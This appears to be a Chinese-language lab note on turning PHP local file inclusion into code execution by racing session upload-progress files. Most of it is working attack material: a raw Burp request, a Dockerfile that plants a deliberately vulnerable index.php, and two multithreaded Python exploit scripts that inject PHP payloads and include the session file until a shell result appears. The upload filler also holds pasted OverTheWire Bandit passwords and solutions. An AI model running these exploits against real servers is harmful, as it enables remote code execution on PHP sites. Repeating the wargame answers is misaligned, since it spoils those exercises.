包含Session文件

包含Session文件

参考文章

利用条件

  • 文件可上传
  • 文件名可控
  • 文件可包含

利用

复现的repeater包(最好把报文增长一点,感觉burpsuite爆破没有python脚本爆破来的快):

POST /?orange=php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/var/lib/php/sessions/sess_j7ur8 HTTP/1.1
Host: 192.168.1.112
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 1949
Connection: close
Referer: http://192.168.1.112/
Cookie: PHPSESSID=j7ur8
Upgrade-Insecure-Requests: 1

-----------------------------191691572411478
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

ZZVVVSM0wyTkhhSGRKUjFacVlVYzRaMWxIYkd0WlJITXZVRzVvZFdFeFZuUlZSVTVw
-----------------------------191691572411478
Content-Disposition: form-data; name="file1"; filename="game.txt"
Content-Type: text/plain

bandit2:CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9    cat ./-
bandit3:UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK    cat ./spaces\ in\ this\ filename
bandit4:pIwrPrtPN36QITSp3EQaw936yaFoFgAB    cat inhere/.hidden
bandit5:koReBOKuIDDepwhWk7jZC0RTdopnAYKh    cat ./-file07
bandit6:DXjZPULLxYr17uwoI01bNLQbtFemEgo7    find . -type f -readable ! -executable -size 1033c
./maybehere07/.file2
bandit7:HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs    find / -type f -group bandit6 -user bandit7 -size 33c
bandit8:cvX2JJa4CFALtqS87jk27qwqGhBM9plV    cat data.txt | grep "millionth"
bandit9:UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR    sort data.txt | uniq -u
bandit10:truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk   strings data.txt |grep "======"
bandit11:IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR   cat data.txt|base64 -d
bandit12:5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu   cat data.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'bandit2:CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9   cat ./-
bandit3:UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK    cat ./spaces\ in\ this\ filename
bandit4:pIwrPrtPN36QITSp3EQaw936yaFoFgAB    cat inhere/.hidden
bandit5:koReBOKuIDDepwhWk7jZC0RTdopnAYKh    cat ./-file07
bandit6:DXjZPULLxYr17uwoI01bNLQbtFemEgo7    find . -type f -readable ! -executable -size 1033c
./maybehere07/.file2
bandit7:HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs    find / -type f -group bandit6 -user bandit7 -size 33c
bandit8:cvX2JJa4CFALtqS87jk27qwqGhBM9plV    cat data.txt | grep "millionth"
bandit9:UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR    sort data.txt | uniq -u
bandit10:truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk   strings data.txt |grep "======"
bandit11:IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR   cat data.txt|base64 -d
bandit12:5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu   cat data.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'
bandit13:8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL   
bandit14:4wcYUJFw0k0XLShlDzztnTBHiqxU3b3    ssh -i sshkey.private bandit14@127.0.0.1
-----------------------------191691572411478
Content-Disposition: form-data; name="file2"; filename=""
Content-Type: application/octet-stream


-----------------------------191691572411478--

案例一

环境

FROM ubuntu:18.04

RUN sed -i s/archive.ubuntu.com/mirrors.aliyun.com/g /etc/apt/sources.list &&\
    sed -i s/security.ubuntu.com/mirrors.aliyun.com/g /etc/apt/sources.list

RUN apt-get update
RUN apt-get -y install tzdata
RUN apt-get -y install php
RUN apt-get -y install apache2
RUN apt-get -y install libapache2-mod-php

RUN rm /var/www/html/index.html


RUN echo 'PD9waHAKICAoJF89QCRfR0VUWydvcmFuZ2UnXSkgJiYgQHN1YnN0cihmaWxlKCRfKVswXSwwLDYpID09PSAnQDw/cGhwJyA/IGluY2x1ZGUoJF8pIDogaGlnaGxpZ2h0X2ZpbGUoX19GSUxFX18pOw==' | base64 -d > /var/www/html/index.php
RUN chmod -R 755 /var/www/html

CMD service apache2 start & tail -F /var/log/apache2/access.log

base64加密的代码为:

<?php
($_=@$_GET['orange']) && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__);

Exp

import sys
import string
import requests
from base64 import b64encode
from random import sample, randint
from multiprocessing.dummy import Pool as ThreadPool

HOST = 'http://192.168.1.112:81/'
sess_name = 'iamorange'

headers = {
    'Connection': 'close', 
    'Cookie': 'PHPSESSID=' + sess_name
}

payload = '@<?php echo `id`;?>'
"""while 1:
    junk = ''.join(sample(string.ascii_letters, randint(8, 16)))
    x = b64encode(payload + junk)
    xx = b64encode(b64encode(payload + junk))
    xxx = b64encode(b64encode(b64encode(payload + junk)))
    if '=' not in x and '=' not in xx and '=' not in xxx:
        print (xxx)
        break"""
xxx='VVVSM0wyTkhhSGRKUjFacVlVYzRaMWxIYkd0WlJITXZVRzVvZFdFeFZuUlZSVTVw'

def runner1(i):
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + xxx + 'Z'
    }
    while 1:
        fp = open('game.txt', 'rb')
        r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
        #print(r.content)
        fp.close()

def runner2(i):
    filename = '/var/lib/php/sessions/sess_' + sess_name
    filename = 'php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s' % filename
    # print filename
    while 1:
        url = '%s?orange=%s' % (HOST, filename)
        r = requests.get(url, headers=headers)
        c = r.content
        if c and b'orange' not in c:
            print(r.content)

if sys.argv[1] == '1':
    runner = runner1
else:
    runner = runner2

pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)

案例二

环境

<?php
include($_GET['file'])

Exp

import requests
import time
import threading


host = 'http://192.168.1.112:81/1.php'
PHPSESSID = 'vrhtvjd4j1sd88onr92fm9t2gt'

def creatSession():
    while True:
        files = {
        "upload" : ("tmp.jpg", open("game.txt", "rb"))
        }
        data = {"PHP_SESSION_UPLOAD_PROGRESS" : "<?php echo md5('1');?>" }
        headers = {'Cookie':'PHPSESSID=' + PHPSESSID}
        r = requests.post(host,files = files,headers = headers,data=data)

fileName = "/var/lib/php/sessions/sess_"+PHPSESSID

if __name__ == '__main__':

    url = "{}/index.php?file={}".format(host,fileName)
    headers = {'Cookie':'PHPSESSID=' + PHPSESSID}
    t = threading.Thread(target=creatSession,args=())
    t.setDaemon(True)
    t.start()
    while True:
        res = requests.get(url,headers=headers)
        if b"c4ca4238a0b923820dcc509a6f75849b" in res.content:
            print("[*] Get shell success.")
            print(res.content)
            break
        else:
            print("[-] retry.")

results matching ""

    No results matching ""